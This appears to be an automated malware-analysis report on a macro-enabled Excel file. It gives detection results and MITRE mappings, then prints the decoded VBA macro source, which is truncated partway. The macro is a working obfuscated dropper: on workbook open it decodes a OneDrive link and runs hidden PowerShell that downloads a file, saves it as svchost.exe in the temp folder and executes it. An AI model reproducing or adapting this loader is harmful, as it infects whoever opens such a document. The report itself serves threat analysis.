MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a Workbook_Open macro that is obfuscated and uses CreateObject to execute code. The macro decodes a URL and attempts to download a second-stage payload from 'http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%201126&authkey=AIuP0x-y17vWwU'. This behavior is consistent with a dropper malware.
Heuristics 6
-
ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6287 bytes |
SHA-256: 0ecb427cc8dec09d103b75ca3ef6a7dcd0787f0562326c6801d23bd397dfa280 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Loader"aHR0cDovL29uZWRyaXZlLmxpdmUuY29tL2Rvd25sb2FkP2NpZD0xODU3OTk1M0YyNDNEOTc5JnJlc2lkPTE4NTc5OTUzRjI0M0Q5NzklMjExMjYmYXV0aGtleT1BSXVQMHgteTE3dldZd1U="
End Sub
Function SySteM7A0OpK12VCGhAPlMN76GDHHBCHrw4PNbv_TGSFQPAL(str As String) As Variant: Dim bytes() As Byte: bytes = str: SySteM7A0OpK12VCGhAPlMN76GDHHBCHrw4PNbv_TGSFQPAL = bytes: End Function
Function ZCXVPOlPLokT5498ADSQEWp0OMCBhg_Olap6HG(bytes() As Byte) As String: Dim str As String: str = bytes: ZCXVPOlPLokT5498ADSQEWp0OMCBhg_Olap6HG = str: End Function
Function BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV(str As String) As String
Const PLAO980ARQDXVQWRAEDS_DB As String = "qg1qysdvvxlj366df"
Dim ZAGSFPLOKYHSGRETBg56tsref_BBA() As Byte, SokNAH_() As Byte
ZAGSFPLOKYHSGRETBg56tsref_BBA = SySteM7A0OpK12VCGhAPlMN76GDHHBCHrw4PNbv_TGSFQPAL(str)
CVFBy678IolPXVFSC12VbX_VCBN = SySteM7A0OpK12VCGhAPlMN76GDHHBCHrw4PNbv_TGSFQPAL(PLAO980ARQDXVQWRAEDS_DB)
Dim COCOBCV0934VCBcxvTT50opaOO0C As Long
COCOBCV0934VCBcxvTT50opaOO0C = UBound(ZAGSFPLOKYHSGRETBg56tsref_BBA)
ReDim KoSoVoBPo_(0 To COCOBCV0934VCBcxvTT50opaOO0C) As Byte
Dim idx As Long
For idx = LBound(ZAGSFPLOKYHSGRETBg56tsref_BBA) To COCOBCV0934VCBcxvTT50opaOO0C:
If Not ZAGSFPLOKYHSGRETBg56tsref_BBA(idx) = 0 Then
c = ZAGSFPLOKYHSGRETBg56tsref_BBA(idx)
For i = 0 To UBound(CVFBy678IolPXVFSC12VbX_VCBN):
c = c Xor CVFBy678IolPXVFSC12VbX_VCBN(i)
Next i
KoSoVoBPo_(idx) = c
End If
Next idx
BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV = ZCXVPOlPLokT5498ADSQEWp0OMCBhg_Olap6HG(KoSoVoBPo_)
End Function
Public Sub Loader(Link As String)
CreateObject(Aplo90VXcAzQQ2ERvcbMNploG690FXDCs5DGPWRE_PPC("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xzdmNob3N0LmV4ZScpOyhOZXctT2JqZWN0IC1jb20gU2hlbGwuQXBwbGljYXRpb24pLlNoZWxsRXhlY3V0ZSgkZW52OlRlbXArJ1xzdmNob3N0LmV4ZScp"))
End Sub
Public Function Aplo90VXcAzQQ2ERvcbMNploG690FXDCs5DGPWRE_PPC(ByVal WQEAds908766VCQRETPlmBBvCXv0PlZCXBTreFGSTO88867FXVSF_XX As String) As String
Dim ADZpo985TFSRd8trsRReVXCvMNZ As String
Dim PAloBCv56XCzBVghAREq89Nm As String
Dim rno5s33dvhaypouve As Long
For PLxvGGNbYTASDZp90FGXWqZAmLLPFXGo89CX = 1 To Len(WQEAds908766VCQRETPlmBBvCXv0PlZCXBTreFGSTO88867FXVSF_XX) Step 3
wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa = chr$(Val(BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV(chr(81) & "?" & "") & Mid$(WQEAds908766VCQRETPlmBBvCXv0PlZCXBTreFGSTO88867FXVSF_XX, PLxvGGNbYTASDZp90FGXWqZAmLLPFXGo89CX, 2)))
ygovl6cr2igluj12f = ygovl6cr2igluj12f & wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa
Next PLxvGGNbYTASDZp90FGXWqZAmLLPFXGo89CX
Aplo90VXcAzQQ2ERvcbMNploG690FXDCs5DGPWRE_PPC = ygovl6cr2igluj12f
End Function
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV(chr(87)), "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV("5" & "" & " " & "" & " " & "" & chr(18) & "" & chr(65) & "" & "C" & "" & chr(51) & chr(18) & "" & chr(20) & chr(24) & "" & chr(19) & chr(18)), BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV(chr(53) & "" & chr(22) & chr(19) & "" & "W" & "" & chr(53) & "" &
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 7168 bytes |
SHA-256: 70fcf234563229aeb8184a86608ab6d09d26f5c7878117ae5ee9941d305a0771 |
|||
|
Detection
ClamAV:
Xls.Dropper.EPPlus-9802867-2
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.